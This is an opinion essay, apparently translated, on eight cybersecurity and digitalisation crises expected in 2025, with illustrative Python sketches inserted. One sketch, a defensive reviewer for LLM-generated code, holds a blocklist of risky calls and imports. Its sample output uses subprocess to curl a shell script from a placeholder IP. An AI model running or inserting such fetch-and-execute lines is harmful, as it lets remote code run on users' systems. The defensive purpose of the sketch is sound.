2025: The Crises Facing Digitalization

As 2025 arrives, "top ten" lists of every kind come pouring in. For a grassroots practitioner, the digital crises we will face in 2025 are an important reference point for guiding cybersecurity work. Drawing on what we have done, seen, and heard over the past five years, and on the country's steady stream of policies, laws, departmental rules, and standards, the author sets out the digital crises we will confront in 2025. I had intended to call them "terrors", but for fear of being labeled clickbait, "crises" is the more fitting word.
First, we will face all manner of strange cloud outages. In traditional network terms, the smallest blast radius of a single server is one business function or module, and the worst case is the complete collapse of one business process. In the cloud, by contrast, the smallest impact of a crashed virtual host is the SaaS applications published on it; but because resources are shared, the butterfly effect of one crashed virtual host can trigger race conditions across the entire resource pool, bring the pool down, and ultimately affect the whole cloud platform. This is a simple piece of technical logic, yet in practice remediation stalls because the software developers, cloud service providers, SaaS administrators, and application owners span different organizations, and mounting a unified response becomes genuinely hard. Moreover, as cloud technology spreads, platforms multiply: government clouds, xinchuang (IT application innovation) clouds, public clouds, community clouds, private clouds, and a host of industry-specific clouds. Whether each of these platforms rests on a secure cloud architecture is rarely reflected in their actual design. Much of the time we are deploying fragile cloud applications onto a platform that is already polluted, or about to be. In the end, the cloud crisis will be laid bare by low-quality software development.
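To make the cascade concrete, here is a toy Python sketch of my own (nothing in the original article prescribes it): a shared pool with an optional per-tenant quota, the "bulkhead" idea that limits the blast radius of a runaway tenant. The class name and tenant names are hypothetical.

```python
import threading

class SharedPool:
    """A toy shared resource pool with an optional per-tenant quota (bulkhead).

    Without the quota, one misbehaving tenant can drain the whole pool and
    starve every other tenant hosted on the same platform.
    """

    def __init__(self, capacity: int, per_tenant_quota: int | None = None):
        self._capacity = threading.Semaphore(capacity)
        self._quota = per_tenant_quota
        self._used: dict[str, int] = {}
        self._lock = threading.Lock()

    def acquire(self, tenant: str) -> bool:
        with self._lock:
            if self._quota is not None and self._used.get(tenant, 0) >= self._quota:
                return False  # bulkhead: this tenant is capped, others are unaffected
            self._used[tenant] = self._used.get(tenant, 0) + 1
        if not self._capacity.acquire(blocking=False):
            with self._lock:
                self._used[tenant] -= 1
            return False      # pool exhausted: every tenant on the platform now fails
        return True

# A runaway tenant grabs resources in a loop. With per_tenant_quota=None it takes
# the whole pool and "tenant-b" gets nothing; with per_tenant_quota=4 the damage
# stops at 4 and the rest of the platform keeps working.
pool = SharedPool(capacity=10, per_tenant_quota=None)
taken = sum(pool.acquire("tenant-a") for _ in range(100))
print("runaway tenant took", taken, "of 10; tenant-b gets a slot:", pool.acquire("tenant-b"))
```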
Second, the contaminated LLM supply chain. Many people read "large-model supply chain" as the supply relationships that go into building a model; what I want to discuss is the supply-chain crisis created by large-model applications. As people come to trust generative AI, they increasingly rely on it outright for decisions and deliverables: documents, plans, code, learning assessments, summaries, and so on. Yet as we use these technologies, whether we ever verify that a model's output is correct, or even meets our needs, grows ever blurrier. Take a model inserting malicious scripts into generated code: I believe this is not the end of the story but only the beginning. More often, the discriminatory answers models produce, and even answers touching on ideology, are challenging social order and stability. We may question a model's output, but have we ever questioned why the model produced that output? Is the problem the pre-set model or the training data? Are we using our own model or a public API model? How long such errors will propagate, and who will detect, identify, correct, and stop them, remains a mystery. When we entrust data security to a model's token-based processing, do we realize that however the machine transforms the data, its creator still has the ability to reconstruct it? More critically, when we apply large models in sectors such as energy, transportation, and healthcare, will the automated decisions of a model prone to talking nonsense lead to far graver crises and consequences? Sometimes this is not a question of how well you tune the model, but of whether you have the emergency-response capability to handle the harm it can cause.
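One concrete form of "verifying the model's output" before trusting it is to statically review generated code prior to running or merging it. The sketch below is my own minimal illustration, not anything proposed in the article: the function name, the blocklists, and the sample output are hypothetical, and a real pipeline would add far more (sandboxed execution, dependency checks, human review).

```python
import ast

# Hypothetical guardrail: inspect LLM-generated Python before it is executed
# or merged. A blocklist scan is only a first, shallow check, not a complete
# defense against poisoned generations.
SUSPICIOUS_CALLS = {"eval", "exec", "system", "Popen", "rmtree"}
SUSPICIOUS_IMPORTS = {"socket", "subprocess", "ctypes"}

def review_generated_code(source: str) -> list[str]:
    findings: list[str] = []
    try:
        tree = ast.parse(source)
    except SyntaxError as err:
        return [f"generated code does not even parse: {err}"]
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            findings += [f"imports {a.name}" for a in node.names
                         if a.name.split(".")[0] in SUSPICIOUS_IMPORTS]
        elif isinstance(node, ast.ImportFrom):
            if (node.module or "").split(".")[0] in SUSPICIOUS_IMPORTS:
                findings.append(f"imports from {node.module}")
        elif isinstance(node, ast.Call):
            fn = node.func
            name = fn.id if isinstance(fn, ast.Name) else getattr(fn, "attr", "")
            if name in SUSPICIOUS_CALLS:
                findings.append(f"calls {name}()")
    return findings

llm_output = "import subprocess\nsubprocess.Popen(['curl', 'http://203.0.113.7/x.sh'])"
print(review_generated_code(llm_output))  # ['imports subprocess', 'calls Popen()']
```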
Third, blind data security measures. "Important data must be encrypted at rest": both the Data Security Law and the Regulations on Network Data Security Management make this an explicit requirement. Fundamentally it is a necessary technical measure, but whether encryption can really be applied directly to a production database is a question that keeps challenging organizations. The reality we often face is that many of the people doing security work do not understand the business or database technology, and sometimes not even development. Their security thinking is therefore built on compliance and on a pure attack-and-defense hacker mindset (and not a battle-tested one at that, but more of a "CTF hacker" mindset), single-mindedly pushing the ideal of security above all. In reality, every technical measure applied to data can directly or indirectly cause business interruption or delay. Organizations and experts who can genuinely think about data security from the business's perspective are few, so the business crises brought on by data security compliance are unavoidable.
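To make the trade-off tangible, here is a minimal sketch of application-layer field encryption, one common way to satisfy an "encrypt important data at rest" requirement without touching the database engine. It is my own illustration under stated assumptions, not something the article prescribes: it assumes the third-party cryptography package, and the citizen table and id_number column are hypothetical. It also shows exactly the business cost the author warns about: once the column holds ciphertext, the database can no longer index, range-scan, or fuzzy-search it.

```python
import sqlite3
from cryptography.fernet import Fernet  # third-party: pip install cryptography

key = Fernet.generate_key()   # in practice the key lives in a KMS/HSM, never in code
box = Fernet(key)

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE citizen (name TEXT, id_number BLOB)")

def insert_citizen(name: str, id_number: str) -> None:
    # The sensitive field is encrypted in the application before it reaches the DB.
    conn.execute("INSERT INTO citizen VALUES (?, ?)",
                 (name, box.encrypt(id_number.encode())))

def read_citizens() -> list[tuple[str, str]]:
    # Plaintext exists only after an explicit decrypt step in the application.
    return [(name, box.decrypt(cipher).decode())
            for name, cipher in conn.execute("SELECT name, id_number FROM citizen")]

insert_citizen("Zhang San", "110101199001011234")
print(read_citizens())
# The compliance box is ticked, but a query such as
#   SELECT * FROM citizen WHERE id_number LIKE '110101%'
# no longer works against the ciphertext column: the business pays for the control.
```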
Fourth, how to cope with low-quality software development that sits high and mighty. IT is a deeply technical field, and people working in it ought to ground their confidence and self-respect in tracing and implementing technology. Yet certain warped modes of thinking have turned the industry into a kind of entertainment. Many software vendors win a steady stream of development projects and maintenance contracts not because of outstanding engineering but because of the benefits that flow from business relationships. When the software they deliver fails, the fix relies less on engineering than on personal connections used to quiet public opinion. This stands in direct opposition to China's rapidly advancing digitalization. In recent years, both software supply chain security audits and software lifecycle audits have surfaced more and more defects and problems in grassroots development teams. The person with the most clout on a development team is not the core engineer but the project manager, and the project manager's clout comes not from project quality but from social connections, a pattern especially prevalent in government systems and in central and state-owned enterprises. Set aside the coming crises of digitalization; many of those problems will surface one by one as the applications are used. More important is that data security fundamentally originates in how software is designed to handle data activities and to orchestrate data through sound code. If we keep treating software as a pile of features, data security will never be more than a compliance requirement.
Fifth, how to cope with the endless stream of compliance inspections. From the original classified protection (MLPS) assessments to cryptography assessments, data security assessments, and the coming critical information infrastructure assessments, most network operators are already run ragged keeping up. The lack of unified standards and criteria means that national, industry, provincial, and higher-level supervisory inspections conflict and contradict one another. Nearly every organization now works, and spends, for the sake of inspections. Inspection ought to be transparent: the inspected party must be told the basis, the requirements, the criteria, and the standards of judgment. In reality we too often inspect for the sake of some interest, and less and less of our security work is genuinely put into practice.
Sixth, "compliance is not security, and certification is not expertise": how to understand compliance and certification has itself become a new crisis. The Regulations on Network Data Security Management require that network data security personnel possess professional knowledge of network data security, but how is that "professional knowledge" demonstrated? By a basic certificate? By actual work experience and track record? There has been top-down discussion of how to make security certification and training more practical, yet in execution we find this is a sprawling ecosystem problem, not something solved by founding a degree program, publishing a textbook, or launching a certification. Solving the people problem is what matters. Do those doing compliance truly understand compliance? Do those doing training truly understand what they teach? In theory, at the start of anything new, only a few people master the skill rather than the masses; knowledge handed down and developed through continual iteration is the healthy path to shared understanding. Certificates do not equal competence, and domestic certifications are increasingly overtaken by commercial value. This crisis will weigh on the conduct and progress of cybersecurity work for a long time to come.
Seventh, still ransomware. Ransomware is evolving faster than we can defend against it. Lured by high returns, its technology will keep advancing; perhaps on the very night we celebrate New Year's Eve, a new variant is born. This is technical confrontation in the truest sense, and it represents the accumulation of forty years of cybersecurity work. Many will say APT is the pinnacle, but ransomware already makes heavy use of APT techniques. Future high-dormancy ransomware will no longer be mere extortion: it will combine network warfare, sustained data theft, intelligent identification of high-value targets, and cross-resource-pool intrusion via cloud technology. Multi-sourced ransomware increasingly resembles the hegemon of the virtual world in The Matrix. Whether ransomware will one day ride the development of AI to evolve into a self-aware virus beyond human control is unknowable, but this is surely not fantasy; it is an inevitability. It is foreseeable that ransomware that exploits in-memory techniques to the fullest will be more terrifying than Stuxnet once was.
Eighth, the boom in the "dark web economy" brought on by economic downturn. Treating data as intelligence and as a commodity has made the market for scraping and selling databases ever more prosperous in recent years; insiders and third-party service staff have already been caught selling databases wholesale. The data security challenge is not only about external attacks: illegal acquisition and misuse of data from the inside will become ever more common as the dark web economy grows. Spurred by that economy, data of every kind flows continuously onto the dark web, where interest groups turn what they obtain into a new wave of state-level threats, online fraud, data analytics, and data re-processing. Never debate how to protect personal privacy in the abstract; what we should focus on is the methods and means we have to keep our own interests from being harmed when privacy is maliciously exploited.
These are the 2025 crises as seen by a pragmatist, and they cannot compete with the lofty pronouncements of experts. More often than not, what we need is to draw a warning, or a response, from a crisis rather than wait for it to arrive and then beg heaven for forgiveness. Every loss is heaven's punishment for disrespecting the rules. There is no Noah's Ark for cybersecurity; we can only rely on ordinary human strength to withstand the punishments handed down by the "god of the network".
Are you ready to accept the punishment?

Originally published on the WeChat official account 老烦的草根安全观: 2025, The Crises Facing Digitalization.
